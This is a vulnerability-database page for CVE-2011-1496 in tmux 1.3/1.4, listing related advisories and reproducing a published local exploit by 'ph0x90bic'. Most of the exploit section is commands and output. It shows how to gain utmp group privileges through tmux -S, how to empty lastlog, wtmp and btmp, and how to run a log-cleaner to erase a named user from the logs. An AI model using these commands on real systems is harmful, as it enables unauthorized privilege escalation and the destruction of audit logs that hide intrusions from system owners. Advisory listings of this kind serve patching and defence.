tmux 1.3/1.4 has a privilege escalation flaw allowing log file deletion without root access.
Reporter | Title | Published | Views | Family All 26 |
---|---|---|---|---|
CVE | CVE-2011-1496 | 18 Apr 201118:55 | – | cve |
NVD | CVE-2011-1496 | 18 Apr 201118:55 | – | nvd |
securityvulns | [SECURITY] [DSA 2212-1] tmux security update | 11 Apr 201100:00 | – | securityvulns |
OpenVAS | Fedora Update for tmux FEDORA-2011-5167 | 21 Apr 201100:00 | – | openvas |
OpenVAS | Fedora Update for tmux FEDORA-2011-5156 | 21 Apr 201100:00 | – | openvas |
OpenVAS | Fedora Update for tmux FEDORA-2011-5156 | 21 Apr 201100:00 | – | openvas |
OpenVAS | Debian Security Advisory DSA 2212-1 (tmux) | 12 May 201100:00 | – | openvas |
OpenVAS | Debian: Security Advisory (DSA-2212-1) | 12 May 201100:00 | – | openvas |
OpenVAS | Fedora Update for tmux FEDORA-2011-5167 | 21 Apr 201100:00 | – | openvas |
Tenable Nessus | Fedora 13 : tmux-1.4-3.fc13 (2011-5156) | 19 Apr 201100:00 | – | nessus |
---------------------------------------
| Team ph0x90bic proudly presents |
| tmux -S 1.3/1.4 local utmp exploit |
---------------------------------------
# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability
# Date: 11.04.2011
# Author: ph0x90bic
# Software Link: http://tmux.sourceforge.net/
# Version: 1.3/1.4
# Tested on: Linux debian 2.6.26-1-686
# CVE : CVE-2011-1496
---
INTRODUCTION
tmux 1.3/1.4 contains a privilege escalation vulnerabillity,
which gives you utmp group privileges. This bug is important,
because it is possible to clean logfiles and use logcleaners
for btmp, wtmp and lastlog without local root access.
---
EXPLOIT
Execute shell as utmp group
$ tmux -S /tmp/.whateveryouwant -c id
uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)
$ tmux -S /tmp/.whateveryouwant -c /bin/sh
$ id
uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)
--
Delete logfiles
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog'
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp'
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp'
--
Use logcleaner software
$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo